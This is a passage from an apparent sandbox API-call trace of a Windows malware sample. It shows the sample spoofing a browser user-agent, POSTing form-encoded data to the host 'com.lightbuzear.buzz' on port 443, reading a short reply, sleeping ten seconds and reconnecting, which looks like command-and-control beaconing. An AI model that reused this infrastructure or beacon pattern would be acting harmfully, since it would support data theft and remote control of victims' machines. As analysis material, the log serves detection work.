hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830318 | out: hHeap=0x4780000) returned 1 [0232.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482ffa8 [0232.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0232.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830110 [0232.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0232.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0232.287] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0232.288] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0232.288] FreeLibrary (hLibModule=0x71780000) returned 1 [0232.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830110 | out: hHeap=0x4780000) returned 1 [0232.288] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0232.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830318 [0232.288] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0232.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0232.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0232.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0232.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0232.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0232.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0232.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0232.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5f0 [0232.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0232.290] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815770 [0232.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0232.290] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48157e8 [0232.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815770 | out: hHeap=0x4780000) returned 1 [0232.290] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0232.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157e8 | out: hHeap=0x4780000) returned 1 [0232.290] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48155c0 [0232.290] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48300e8 [0232.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48300e8 | out: hHeap=0x4780000) returned 1 [0232.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0232.290] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830048 [0232.290] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0232.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48303e0 [0232.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0232.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0232.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0232.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0232.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0232.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0232.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0232.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0232.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0232.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815638 [0232.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0232.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815560 [0232.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0232.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0232.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815560 | out: hHeap=0x4780000) returned 1 [0232.599] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815770 [0232.599] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48300e8 [0232.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48300e8 | out: hHeap=0x4780000) returned 1 [0232.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0232.600] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0232.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0232.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0232.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0232.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0232.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0232.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0232.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0232.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0232.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0232.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815650 [0232.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0232.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815638 [0232.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815650 | out: hHeap=0x4780000) returned 1 [0232.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0232.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0232.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48300e8 [0232.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0232.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb908 [0232.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48300e8 | out: hHeap=0x4780000) returned 1 [0232.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48300e8 [0232.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0232.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830110 [0232.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0232.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0232.603] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0232.603] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0232.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830110 | out: hHeap=0x4780000) returned 1 [0232.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0232.604] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0232.604] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0232.604] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0232.604] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0232.604] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0232.604] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0232.604] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0232.735] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0232.735] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48157d0 [0232.735] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0232.735] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48157e8 [0232.735] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157d0 | out: hHeap=0x4780000) returned 1 [0232.735] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0232.736] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157e8 | out: hHeap=0x4780000) returned 1 [0232.736] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830110 [0232.736] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0232.736] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0232.736] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830110 | out: hHeap=0x4780000) returned 1 [0232.736] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830110 [0232.736] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0232.736] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830138 [0232.736] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0232.737] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0232.737] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0232.737] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0233.969] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830138 | out: hHeap=0x4780000) returned 1 [0233.969] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0233.970] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0233.970] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0233.970] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0233.970] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0233.970] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0233.970] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0233.970] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0233.970] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0233.970] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0233.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0233.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0233.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48155f0 [0233.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0233.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48157d0 [0233.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155f0 | out: hHeap=0x4780000) returned 1 [0233.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0233.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157d0 | out: hHeap=0x4780000) returned 1 [0233.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830138 [0233.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0233.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb8d0 [0233.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830138 | out: hHeap=0x4780000) returned 1 [0233.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830138 [0233.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0233.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830930 [0233.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0233.972] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0233.972] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0233.972] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0233.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830930 | out: hHeap=0x4780000) returned 1 [0233.973] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0233.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0233.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0233.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0233.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0233.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0233.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0233.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0233.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0233.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0233.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48155f0 [0233.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0233.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815680 [0233.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155f0 | out: hHeap=0x4780000) returned 1 [0233.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0233.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815680 | out: hHeap=0x4780000) returned 1 [0233.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830930 [0233.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0233.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0233.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830930 | out: hHeap=0x4780000) returned 1 [0233.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830840 [0233.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0233.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830520 [0233.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0233.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0233.975] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0233.975] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0233.975] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830520 | out: hHeap=0x4780000) returned 1 [0233.975] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0233.975] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0233.975] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0233.975] FreeLibrary (hLibModule=0x71570000) returned 1 [0233.975] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0233.975] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0233.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48303e0 | out: hHeap=0x4780000) returned 1 [0233.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830048 | out: hHeap=0x4780000) returned 1 [0233.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830318 | out: hHeap=0x4780000) returned 1 [0233.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0233.976] Sleep (dwMilliseconds=0x2710) [0234.030] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0234.030] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0234.030] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0234.030] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0234.030] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0234.030] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0234.030] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0234.031] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0234.031] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0234.031] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48155f0 [0234.031] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0234.031] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815608 [0234.031] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155f0 | out: hHeap=0x4780000) returned 1 [0234.031] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0234.031] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815608 | out: hHeap=0x4780000) returned 1 [0234.031] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48157a0 [0234.031] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0234.031] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0234.031] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0234.031] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0234.032] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0234.032] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0234.032] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0234.032] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0234.032] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0234.032] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0234.032] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0234.032] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0234.032] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0234.032] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0234.032] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48155f0 [0234.032] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0234.032] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815560 [0234.032] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155f0 | out: hHeap=0x4780000) returned 1 [0234.033] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0234.033] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815560 | out: hHeap=0x4780000) returned 1 [0234.033] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830048 [0234.033] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0234.033] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0234.033] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830048 | out: hHeap=0x4780000) returned 1 [0234.033] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830048 [0234.033] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0234.033] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48303e0 [0234.033] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0234.034] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0234.034] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0234.034] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0234.034] FreeLibrary (hLibModule=0x71780000) returned 1 [0234.034] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48303e0 | out: hHeap=0x4780000) returned 1 [0234.034] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0234.034] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830318 [0234.035] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0234.035] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0234.035] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0234.035] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0234.035] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0234.035] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0234.035] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0234.035] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0234.035] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0234.035] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0234.035] 